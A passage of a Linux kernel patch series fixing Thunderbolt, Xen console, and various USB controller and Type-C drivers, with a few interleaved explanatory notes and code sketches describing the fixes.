++	USB4_SB_OPCODE_UNSET_INBOUND_SBTX = 0x50555355,		/* "USUP" */
+ 	USB4_SB_OPCODE_QUERY_LAST_RETIMER = 0x5453414c,		/* "LAST" */
+ 	USB4_SB_OPCODE_GET_NVM_SECTOR_SIZE = 0x53534e47,	/* "GNSS" */
+ 	USB4_SB_OPCODE_NVM_SET_OFFSET = 0x53504f42,		/* "BOPS" */
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 60da5c23ccaf4..9699d167d522d 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2959,8 +2959,6 @@ int tb_switch_add(struct tb_switch *sw)
+ 			dev_warn(&sw->dev, "reading DROM failed: %d\n", ret);
+ 		tb_sw_dbg(sw, "uid: %#llx\n", sw->uid);
+ 
+-		tb_check_quirks(sw);
+-
+ 		ret = tb_switch_set_uuid(sw);
+ 		if (ret) {
+ 			dev_err(&sw->dev, "failed to set UUID\n");
+@@ -2979,6 +2977,8 @@ int tb_switch_add(struct tb_switch *sw)
+ 			}
+ 		}
+ 
++		tb_check_quirks(sw);
++
+ 		tb_switch_default_link_ports(sw);
+ 
+ 		ret = tb_switch_update_link_attributes(sw);
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index f9786976f5ecf..e11d973a8f9b6 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -23,6 +23,11 @@
+ #define NVM_MAX_SIZE		SZ_512K
+ #define NVM_DATA_DWORDS		16
+ 
++/* Keep link controller awake during update */
++#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
++/* Disable CLx if not supported */
++#define QUIRK_NO_CLX					BIT(1)
++
+ /**
+  * struct tb_nvm - Structure holding NVM information
+  * @dev: Owner of the NVM
+@@ -997,6 +1002,9 @@ static inline bool tb_switch_is_clx_enabled(const struct tb_switch *sw,
+  */
+ static inline bool tb_switch_is_clx_supported(const struct tb_switch *sw)
+ {
++	if (sw->quirks & QUIRK_NO_CLX)
++		return false;
++
+ 	return tb_switch_is_usb4(sw) || tb_switch_is_titan_ridge(sw);
+ }
+ 
+@@ -1212,6 +1220,7 @@ int usb4_port_sw_margin(struct tb_port *port, unsigned int lanes, bool timing,
+ int usb4_port_sw_margin_errors(struct tb_port *port, u32 *errors);
+ 
+ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index);
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index);
+ int usb4_port_retimer_read(struct tb_port *port, u8 index, u8 reg, void *buf,
+ 			   u8 size);
+ int usb4_port_retimer_write(struct tb_port *port, u8 index, u8 reg,
+@@ -1254,9 +1263,6 @@ struct usb4_port *usb4_port_device_add(struct tb_port *port);
+ void usb4_port_device_remove(struct usb4_port *usb4);
+ int usb4_port_device_resume(struct usb4_port *usb4);
+ 
+-/* Keep link controller awake during update */
+-#define QUIRK_FORCE_POWER_LINK_CONTROLLER		BIT(0)
+-
+ void tb_check_quirks(struct tb_switch *sw);
+ 
+ #ifdef CONFIG_ACPI
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index f986854aa207a..cf8d4f769579e 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -1561,6 +1561,20 @@ int usb4_port_retimer_set_inbound_sbtx(struct tb_port *port, u8 index)
+ 				    500);
+ }
+ 
++/**
++ * usb4_port_retimer_unset_inbound_sbtx() - Disable sideband channel transactions
++ * @port: USB4 port
++ * @index: Retimer index
++ *
++ * Disables sideband channel transactions on SBTX. The reverse of
++ * usb4_port_retimer_set_inbound_sbtx().
++ */
++int usb4_port_retimer_unset_inbound_sbtx(struct tb_port *port, u8 index)
++{
++	return usb4_port_retimer_op(port, index,
++				    USB4_SB_OPCODE_UNSET_INBOUND_SBTX, 500);
++}
++
+ /**
+  * usb4_port_retimer_read() - Read from retimer sideband registers
+  * @port: USB4 port
+@@ -2050,18 +2064,30 @@ static int usb4_usb3_port_write_allocated_bandwidth(struct tb_port *port,
+ 						    int downstream_bw)
+ {
+ 	u32 val, ubw, dbw, scale;
+-	int ret;
++	int ret, max_bw;
+ 
+-	/* Read the used scale, hardware default is 0 */
+-	ret = tb_port_read(port, &scale, TB_CFG_PORT,
+-			   port->cap_adap + ADP_USB3_CS_3, 1);
++	/* Figure out suitable scale */
++	scale = 0;
++	max_bw = max(upstream_bw, downstream_bw);
++	while (scale < 64) {
++		if (mbps_to_usb3_bw(max_bw, scale) < 4096)
++			break;
++		scale++;
++	}
++
++	if (WARN_ON(scale >= 64))
++		return -EINVAL;
++
++	ret = tb_port_write(port, &scale, TB_CFG_PORT,
++			    port->cap_adap + ADP_USB3_CS_3, 1);
+ 	if (ret)
+ 		return ret;
+ 
+-	scale &= ADP_USB3_CS_3_SCALE_MASK;
+ 	ubw = mbps_to_usb3_bw(upstream_bw, scale);
+ 	dbw = mbps_to_usb3_bw(downstream_bw, scale);
+ 
++	tb_port_dbg(port, "scaled bandwidth %u/%u, scale %u\n", ubw, dbw, scale);
++
+ 	ret = tb_port_read(port, &val, TB_CFG_PORT,
+ 			   port->cap_adap + ADP_USB3_CS_2, 1);
+ 	if (ret)
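
Instead of reusing whatever scale the hardware last had, the hunk computes the smallest scale that makes both bandwidth values fit the register field. A worked sketch, assuming mbps_to_usb3_bw() shrinks its result as the scale grows, which the < 4096 bound suggests (example_pick_scale is hypothetical):

static int example_pick_scale(int upstream_bw, int downstream_bw, u32 *scale)
{
	int max_bw = max(upstream_bw, downstream_bw);

	/* Find the smallest scale whose encoding fits the 12-bit field. */
	for (*scale = 0; *scale < 64; (*scale)++) {
		if (mbps_to_usb3_bw(max_bw, *scale) < 4096)
			return 0;
	}

	return -EINVAL;	/* bandwidth not representable at any scale */
}
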
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index 37809c6c027fc..d9d0232753286 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -43,6 +43,7 @@ struct xencons_info {
+ 	int irq;
+ 	int vtermno;
+ 	grant_ref_t gntref;
++	spinlock_t ring_lock;
+ };
+ 
+ static LIST_HEAD(xenconsoles);
+@@ -89,12 +90,15 @@ static int __write_console(struct xencons_info *xencons,
+ 	XENCONS_RING_IDX cons, prod;
+ 	struct xencons_interface *intf = xencons->intf;
+ 	int sent = 0;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->out_cons;
+ 	prod = intf->out_prod;
+ 	mb();			/* update queue values before going on */
+ 
+ 	if ((prod - cons) > sizeof(intf->out)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -104,6 +108,7 @@ static int __write_console(struct xencons_info *xencons,
+ 
+ 	wmb();			/* write ring before updating pointer */
+ 	intf->out_prod = prod;
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 
+ 	if (sent)
+ 		notify_daemon(xencons);
+@@ -146,16 +151,19 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 	int recv = 0;
+ 	struct xencons_info *xencons = vtermno_to_xencons(vtermno);
+ 	unsigned int eoiflag = 0;
++	unsigned long flags;
+ 
+ 	if (xencons == NULL)
+ 		return -EINVAL;
+ 	intf = xencons->intf;
+ 
++	spin_lock_irqsave(&xencons->ring_lock, flags);
+ 	cons = intf->in_cons;
+ 	prod = intf->in_prod;
+ 	mb();			/* get pointers before reading ring */
+ 
+ 	if ((prod - cons) > sizeof(intf->in)) {
++		spin_unlock_irqrestore(&xencons->ring_lock, flags);
+ 		pr_err_once("xencons: Illegal ring page indices");
+ 		return -EINVAL;
+ 	}
+@@ -179,10 +187,13 @@ static int domU_read_console(uint32_t vtermno, char *buf, int len)
+ 		xencons->out_cons = intf->out_cons;
+ 		xencons->out_cons_same = 0;
+ 	}
++	if (!recv && xencons->out_cons_same++ > 1) {
++		eoiflag = XEN_EOI_FLAG_SPURIOUS;
++	}
++	spin_unlock_irqrestore(&xencons->ring_lock, flags);
++
+ 	if (recv) {
+ 		notify_daemon(xencons);
+-	} else if (xencons->out_cons_same++ > 1) {
+-		eoiflag = XEN_EOI_FLAG_SPURIOUS;
+ 	}
+ 
+ 	xen_irq_lateeoi(xencons->irq, eoiflag);
+@@ -239,6 +250,7 @@ static int xen_hvm_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	} else if (info->intf != NULL) {
+ 		/* already configured */
+ 		return 0;
+@@ -275,6 +287,7 @@ err:
+ 
+ static int xencons_info_pv_init(struct xencons_info *info, int vtermno)
+ {
++	spin_lock_init(&info->ring_lock);
+ 	info->evtchn = xen_start_info->console.domU.evtchn;
+ 	/* GFN == MFN for PV guest */
+ 	info->intf = gfn_to_virt(xen_start_info->console.domU.mfn);
+@@ -325,6 +338,7 @@ static int xen_initial_domain_console_init(void)
+ 		info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 		if (!info)
+ 			return -ENOMEM;
++		spin_lock_init(&info->ring_lock);
+ 	}
+ 
+ 	info->irq = bind_virq_to_irq(VIRQ_CONSOLE, 0, false);
+@@ -482,6 +496,7 @@ static int xencons_probe(struct xenbus_device *dev,
+ 	info = kzalloc(sizeof(struct xencons_info), GFP_KERNEL);
+ 	if (!info)
+ 		return -ENOMEM;
++	spin_lock_init(&info->ring_lock);
+ 	dev_set_drvdata(&dev->dev, info);
+ 	info->xbdev = dev;
+ 	info->vtermno = xenbus_devid_to_vtermno(devid);
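
All of the hvc_xen hunks above follow one pattern: read the producer/consumer indices, validate them, and update the ring under the new per-console spinlock so concurrent callers cannot interleave. A condensed sketch of that pattern (example_ring_put is hypothetical):

static int example_ring_put(struct xencons_info *xencons, char ch)
{
	struct xencons_interface *intf = xencons->intf;
	XENCONS_RING_IDX cons, prod;
	unsigned long flags;

	spin_lock_irqsave(&xencons->ring_lock, flags);
	cons = intf->out_cons;
	prod = intf->out_prod;
	mb();	/* read indices before touching ring contents */

	if ((prod - cons) > sizeof(intf->out)) {
		/* indices corrupted by the backend; bail out under the lock */
		spin_unlock_irqrestore(&xencons->ring_lock, flags);
		return -EINVAL;
	}

	intf->out[MASK_XENCONS_IDX(prod++, intf->out)] = ch;
	wmb();	/* publish data before the new producer index */
	intf->out_prod = prod;
	spin_unlock_irqrestore(&xencons->ring_lock, flags);

	return 0;
}
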
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index edd34dac91b1d..d89ce7fb6b363 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -10074,4 +10074,5 @@ module_exit(ufshcd_core_exit);
+ MODULE_AUTHOR("Santosh Yaragnavi <santosh.sy@samsung.com>");
+ MODULE_AUTHOR("Vinayak Holikatti <h.vinayak@samsung.com>");
+ MODULE_DESCRIPTION("Generic UFS host controller driver Core");
++MODULE_SOFTDEP("pre: governor_simpleondemand");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/usb/cdns3/cdns3-pci-wrap.c b/drivers/usb/cdns3/cdns3-pci-wrap.c
+index deeea618ba33b..1f6320d98a76b 100644
+--- a/drivers/usb/cdns3/cdns3-pci-wrap.c
++++ b/drivers/usb/cdns3/cdns3-pci-wrap.c
+@@ -60,6 +60,11 @@ static struct pci_dev *cdns3_get_second_fun(struct pci_dev *pdev)
+ 			return NULL;
+ 	}
+ 
++	if (func->devfn != PCI_DEV_FN_HOST_DEVICE &&
++	    func->devfn != PCI_DEV_FN_OTG) {
++		return NULL;
++	}
++
+ 	return func;
+ }
+ 
+diff --git a/drivers/usb/cdns3/cdnsp-ep0.c b/drivers/usb/cdns3/cdnsp-ep0.c
+index 9b8325f824992..d63d5d92f2554 100644
+--- a/drivers/usb/cdns3/cdnsp-ep0.c
++++ b/drivers/usb/cdns3/cdnsp-ep0.c
+@@ -403,20 +403,6 @@ static int cdnsp_ep0_std_request(struct cdnsp_device *pdev,
+ 	case USB_REQ_SET_ISOCH_DELAY:
+ 		ret = cdnsp_ep0_set_isoch_delay(pdev, ctrl);
+ 		break;
+-	case USB_REQ_SET_INTERFACE:
+-		/*
+-		 * Add request into pending list to block sending status stage
+-		 * by libcomposite.
+-		 */
+-		list_add_tail(&pdev->ep0_preq.list,
+-			      &pdev->ep0_preq.pep->pending_list);
+-
+-		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+-		if (ret == -EBUSY)
+-			ret = 0;
+-
+-		list_del(&pdev->ep0_preq.list);
+-		break;
+ 	default:
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 		break;
+@@ -474,9 +460,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 	else
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 
+-	if (!len)
+-		pdev->ep0_stage = CDNSP_STATUS_STAGE;
+-
+ 	if (ret == USB_GADGET_DELAYED_STATUS) {
+ 		trace_cdnsp_ep0_status_stage("delayed");
+ 		return;
+@@ -484,6 +467,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ out:
+ 	if (ret < 0)
+ 		cdnsp_ep0_stall(pdev);
+-	else if (pdev->ep0_stage == CDNSP_STATUS_STAGE)
++	else if (!len && pdev->ep0_stage != CDNSP_STATUS_STAGE)
+ 		cdnsp_status_stage(pdev);
+ }
+diff --git a/drivers/usb/cdns3/cdnsp-pci.c b/drivers/usb/cdns3/cdnsp-pci.c
+index fe8a114c586cc..29f433c5a6f3f 100644
+--- a/drivers/usb/cdns3/cdnsp-pci.c
++++ b/drivers/usb/cdns3/cdnsp-pci.c
+@@ -29,30 +29,23 @@
+ #define PLAT_DRIVER_NAME	"cdns-usbssp"
+ 
+ #define CDNS_VENDOR_ID		0x17cd
+-#define CDNS_DEVICE_ID		0x0100
++#define CDNS_DEVICE_ID		0x0200
++#define CDNS_DRD_ID		0x0100
+ #define CDNS_DRD_IF		(PCI_CLASS_SERIAL_USB << 8 | 0x80)
+ 
+ static struct pci_dev *cdnsp_get_second_fun(struct pci_dev *pdev)
+ {
+-	struct pci_dev *func;
+-
+ 	/*
+ 	 * Gets the second function.
+-	 * It's little tricky, but this platform has two function.
+-	 * The fist keeps resources for Host/Device while the second
+-	 * keeps resources for DRD/OTG.
++	 * The platform has two functions. The first keeps resources for
++	 * Host/Device while the second keeps resources for DRD/OTG.
+ 	 */
+-	func = pci_get_device(pdev->vendor, pdev->device, NULL);
+-	if (!func)
+-		return NULL;
++	if (pdev->device == CDNS_DEVICE_ID)
++		return  pci_get_device(pdev->vendor, CDNS_DRD_ID, NULL);
++	else if (pdev->device == CDNS_DRD_ID)
++		return pci_get_device(pdev->vendor, CDNS_DEVICE_ID, NULL);
+ 
+-	if (func->devfn == pdev->devfn) {
+-		func = pci_get_device(pdev->vendor, pdev->device, func);
+-		if (!func)
+-			return NULL;
+-	}
+-
+-	return func;
++	return NULL;
+ }
+ 
+ static int cdnsp_pci_probe(struct pci_dev *pdev,
+@@ -232,6 +225,8 @@ static const struct pci_device_id cdnsp_pci_ids[] = {
+ 	  PCI_CLASS_SERIAL_USB_DEVICE, PCI_ANY_ID },
+ 	{ PCI_VENDOR_ID_CDNS, CDNS_DEVICE_ID, PCI_ANY_ID, PCI_ANY_ID,
+ 	  CDNS_DRD_IF, PCI_ANY_ID },
++	{ PCI_VENDOR_ID_CDNS, CDNS_DRD_ID, PCI_ANY_ID, PCI_ANY_ID,
++	  CDNS_DRD_IF, PCI_ANY_ID },
+ 	{ 0, }
+ };
+ 
+diff --git a/drivers/usb/chipidea/ci.h b/drivers/usb/chipidea/ci.h
+index a4a3be0499109..85a803c135ab3 100644
+--- a/drivers/usb/chipidea/ci.h
++++ b/drivers/usb/chipidea/ci.h
+@@ -204,6 +204,7 @@ struct hw_bank {
+  * @in_lpm: if the core in low power mode
+  * @wakeup_int: if wakeup interrupt occur
+  * @rev: The revision number for controller
++ * @mutex: protect code from concurrent running when doing role switch
+  */
+ struct ci_hdrc {
+ 	struct device			*dev;
+@@ -256,6 +257,7 @@ struct ci_hdrc {
+ 	bool				in_lpm;
+ 	bool				wakeup_int;
+ 	enum ci_revision		rev;
++	struct mutex                    mutex;
+ };
+ 
+ static inline struct ci_role_driver *ci_role(struct ci_hdrc *ci)
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 6330fa9117926..5abdc2b0f506d 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -977,9 +977,16 @@ static ssize_t role_store(struct device *dev,
+ 			     strlen(ci->roles[role]->name)))
+ 			break;
+ 
+-	if (role == CI_ROLE_END || role == ci->role)
++	if (role == CI_ROLE_END)
+ 		return -EINVAL;
+ 
++	mutex_lock(&ci->mutex);
++
++	if (role == ci->role) {
++		mutex_unlock(&ci->mutex);
++		return n;
++	}
++
+ 	pm_runtime_get_sync(dev);
+ 	disable_irq(ci->irq);
+ 	ci_role_stop(ci);
+@@ -988,6 +995,7 @@ static ssize_t role_store(struct device *dev,
+ 		ci_handle_vbus_change(ci);
+ 	enable_irq(ci->irq);
+ 	pm_runtime_put_sync(dev);
++	mutex_unlock(&ci->mutex);
+ 
+ 	return (ret == 0) ? n : ret;
+ }
+@@ -1023,6 +1031,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	spin_lock_init(&ci->lock);
++	mutex_init(&ci->mutex);
+ 	ci->dev = dev;
+ 	ci->platdata = dev_get_platdata(dev);
+ 	ci->imx28_write_fix = !!(ci->platdata->flags &
+diff --git a/drivers/usb/chipidea/otg.c b/drivers/usb/chipidea/otg.c
+index 7b53274ef9664..10f8cc44a16db 100644
+--- a/drivers/usb/chipidea/otg.c
++++ b/drivers/usb/chipidea/otg.c
+@@ -167,8 +167,10 @@ static int hw_wait_vbus_lower_bsv(struct ci_hdrc *ci)
+ 
+ static void ci_handle_id_switch(struct ci_hdrc *ci)
+ {
+-	enum ci_role role = ci_otg_role(ci);
++	enum ci_role role;
+ 
++	mutex_lock(&ci->mutex);
++	role = ci_otg_role(ci);
+ 	if (role != ci->role) {
+ 		dev_dbg(ci->dev, "switching from %s to %s\n",
+ 			ci_role(ci)->name, ci->roles[role]->name);
+@@ -198,6 +200,7 @@ static void ci_handle_id_switch(struct ci_hdrc *ci)
+ 		if (role == CI_ROLE_GADGET)
+ 			ci_handle_vbus_change(ci);
+ 	}
++	mutex_unlock(&ci->mutex);
+ }
+ /**
+  * ci_otg_work - perform otg (vbus/id) event handle
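
Both paths that can change roles, the sysfs role_store() handler above and this ID-pin handler, now serialize on ci->mutex. A minimal sketch of the protected section (example_switch_role is hypothetical):

static int example_switch_role(struct ci_hdrc *ci, enum ci_role role)
{
	int ret = 0;

	mutex_lock(&ci->mutex);
	if (role != ci->role) {
		ci_role_stop(ci);		/* tear down the current role */
		ret = ci_role_start(ci, role);	/* bring up the new one */
	}
	mutex_unlock(&ci->mutex);

	return ret;
}
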
+diff --git a/drivers/usb/dwc2/drd.c b/drivers/usb/dwc2/drd.c
+index d8d6493bc4576..a8605b02115b1 100644
+--- a/drivers/usb/dwc2/drd.c
++++ b/drivers/usb/dwc2/drd.c
+@@ -35,7 +35,8 @@ static void dwc2_ovr_init(struct dwc2_hsotg *hsotg)
+ 
+ 	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 
+-	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST));
++	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST) ||
++				(hsotg->role_sw_default_mode == USB_DR_MODE_HOST));
+ }
+ 
+ static int dwc2_ovr_avalid(struct dwc2_hsotg *hsotg, bool valid)
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index ec4ace0107f5f..0c02ef7628fd5 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -91,13 +91,6 @@ static int dwc2_get_dr_mode(struct dwc2_hsotg *hsotg)
+ 	return 0;
+ }
+ 
+-static void __dwc2_disable_regulators(void *data)
+-{
+-	struct dwc2_hsotg *hsotg = data;
+-
+-	regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+-}
+-
+ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ {
+ 	struct platform_device *pdev = to_platform_device(hsotg->dev);
+@@ -108,11 +101,6 @@ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev,
+-				       __dwc2_disable_regulators, hsotg);
+-	if (ret)
+-		return ret;
+-
+ 	if (hsotg->clk) {
+ 		ret = clk_prepare_enable(hsotg->clk);
+ 		if (ret)
+@@ -168,7 +156,7 @@ static int __dwc2_lowlevel_hw_disable(struct dwc2_hsotg *hsotg)
+ 	if (hsotg->clk)
+ 		clk_disable_unprepare(hsotg->clk);
+ 
+-	return 0;
++	return regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+ }
+ 
+ /**
+@@ -607,7 +595,7 @@ error_init:
+ 	if (hsotg->params.activate_stm_id_vb_detection)
+ 		regulator_disable(hsotg->usb33d);
+ error:
+-	if (hsotg->dr_mode != USB_DR_MODE_PERIPHERAL)
++	if (hsotg->ll_hw_enabled)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 	return retval;
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index df1ce96fa2281..5997d7f943fec 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1689,6 +1689,7 @@ static int __dwc3_gadget_get_frame(struct dwc3 *dwc)
+  */
+ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool interrupt)
+ {
++	struct dwc3 *dwc = dep->dwc;
+ 	struct dwc3_gadget_ep_cmd_params params;
+ 	u32 cmd;
+ 	int ret;
+@@ -1712,10 +1713,13 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	WARN_ON_ONCE(ret);
+ 	dep->resource_index = 0;
+ 
+-	if (!interrupt)
++	if (!interrupt) {
++		if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
++			mdelay(1);
+ 		dep->flags &= ~DWC3_EP_TRANSFER_STARTED;
+-	else if (!ret)
++	} else if (!ret) {
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
++	}
+ 
+ 	dep->flags &= ~DWC3_EP_DELAY_STOP;
+ 	return ret;
+@@ -3764,7 +3768,11 @@ void dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force,
+ 	 * enabled, the EndTransfer command will have completed upon
+ 	 * returning from this function.
+ 	 *
+-	 * This mode is NOT available on the DWC_usb31 IP.
++	 * This mode is NOT available on the DWC_usb31 IP.  In that
++	 * case, if the IOC bit is not set, delay by 1ms after issuing
++	 * the EndTransfer command.  This gives the controller time to
++	 * process the command completely before the DWC3 request
++	 * removal path attempts to unmap USB request buffers.
+ 	 */
+ 
+ 	__dwc3_stop_active_transfer(dep, force, interrupt);
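
A reduced sketch of the new wait condition (the version-check macros are the driver's own; example_end_transfer_wait is hypothetical):

static void example_end_transfer_wait(struct dwc3_ep *dep)
{
	struct dwc3 *dwc = dep->dwc;	/* the macros below reference 'dwc' */

	/*
	 * Only DWC_usb3 3.10a and later can complete EndTransfer without
	 * an interrupt; every other core gets a 1ms grace period so the
	 * command finishes before request buffers are unmapped.
	 */
	if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
		mdelay(1);
}
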
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index c1f62e91b0126..4a42574b4a7fe 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -1422,7 +1422,7 @@ void g_audio_cleanup(struct g_audio *g_audio)
+ 	uac = g_audio->uac;
+ 	card = uac->card;
+ 	if (card)
+-		snd_card_free(card);
++		snd_card_free_when_closed(card);
+ 
+ 	kfree(uac->p_prm.reqs);
+ 	kfree(uac->c_prm.reqs);
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index 044e75ad4d20c..832d3ba9368ff 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -406,6 +406,7 @@ static void onboard_hub_usbdev_disconnect(struct usb_device *udev)
+ 
+ static const struct usb_device_id onboard_hub_id_table[] = {
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2514) }, /* USB2514B USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2517) }, /* USB2517 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0411) }, /* RTS5411 USB 3.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x5411) }, /* RTS5411 USB 2.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0414) }, /* RTS5414 USB 3.2 */
+diff --git a/drivers/usb/misc/onboard_usb_hub.h b/drivers/usb/misc/onboard_usb_hub.h
+index 34beab8bce3d6..2cde54b69eede 100644
+--- a/drivers/usb/misc/onboard_usb_hub.h
++++ b/drivers/usb/misc/onboard_usb_hub.h
+@@ -24,6 +24,7 @@ static const struct onboard_hub_pdata ti_tusb8041_data = {
+ 
+ static const struct of_device_id onboard_hub_match[] = {
+ 	{ .compatible = "usb424,2514", .data = &microchip_usb424_data, },
++	{ .compatible = "usb424,2517", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb451,8140", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb451,8142", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usbbda,411", .data = &realtek_rts5411_data, },
+diff --git a/drivers/usb/storage/unusual_uas.h b/drivers/usb/storage/unusual_uas.h
+index c7b763d6d1023..1f8c9b16a0fb8 100644
+--- a/drivers/usb/storage/unusual_uas.h
++++ b/drivers/usb/storage/unusual_uas.h
+@@ -111,6 +111,13 @@ UNUSUAL_DEV(0x152d, 0x0578, 0x0000, 0x9999,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_BROKEN_FUA),
+ 
++/* Reported by: Yaroslav Furman <yaro330@gmail.com> */
++UNUSUAL_DEV(0x152d, 0x0583, 0x0000, 0x9999,
++		"JMicron",
++		"JMS583Gen 2",
++		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
++		US_FL_NO_REPORT_OPCODES),
++
+ /* Reported-by: Thinh Nguyen <thinhn@synopsys.com> */
+ UNUSUAL_DEV(0x154b, 0xf00b, 0x0000, 0x9999,
+ 		"PNY",
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 59b366b5c6144..032d21a967799 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1436,10 +1436,18 @@ static int tcpm_ams_start(struct tcpm_port *port, enum tcpm_ams ams)
+ static void tcpm_queue_vdm(struct tcpm_port *port, const u32 header,
+ 			   const u32 *data, int cnt)
+ {
++	u32 vdo_hdr = port->vdo_data[0];
++
+ 	WARN_ON(!mutex_is_locked(&port->lock));
+ 
+-	/* Make sure we are not still processing a previous VDM packet */
+-	WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	/* If we are sending discover_identity, handle the received message first */
++	if (PD_VDO_SVDM(vdo_hdr) && PD_VDO_CMD(vdo_hdr) == CMD_DISCOVER_IDENT) {
++		port->send_discover = true;
++		mod_send_discover_delayed_work(port, SEND_DISCOVER_RETRY_MS);
++	} else {
++		/* Make sure we are not still processing a previous VDM packet */
++		WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	}
+ 
+ 	port->vdo_count = cnt + 1;
+ 	port->vdo_data[0] = header;
+@@ -1942,11 +1950,13 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			switch (PD_VDO_CMD(vdo_hdr)) {
+ 			case CMD_DISCOVER_IDENT:
+ 				res = tcpm_ams_start(port, DISCOVER_IDENTITY);
+-				if (res == 0)
++				if (res == 0) {
+ 					port->send_discover = false;
+-				else if (res == -EAGAIN)
++				} else if (res == -EAGAIN) {
++					port->vdo_data[0] = 0;
+ 					mod_send_discover_delayed_work(port,
+ 								       SEND_DISCOVER_RETRY_MS);
++				}
+ 				break;
+ 			case CMD_DISCOVER_SVID:
+ 				res = tcpm_ams_start(port, DISCOVER_SVIDS);
+@@ -2029,6 +2039,7 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			unsigned long timeout;
+ 
+ 			port->vdm_retries = 0;
++			port->vdo_data[0] = 0;
+ 			port->vdm_state = VDM_STATE_BUSY;
+ 			timeout = vdm_ready_timeout(vdo_hdr);
+ 			mod_vdm_delayed_work(port, timeout);
+@@ -4547,6 +4558,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
